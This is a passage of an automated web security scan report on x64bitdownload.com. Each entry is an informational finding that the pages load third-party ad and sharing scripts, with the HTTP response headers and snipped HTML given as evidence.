Content-Type: text/html; charset=UTF-8
Content-Length: 92538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1361. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1362. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1363. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1364. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1365. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1366. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1367. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1368. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1369. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1370. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1371. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1372. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1373. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1374. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1375. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1376. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
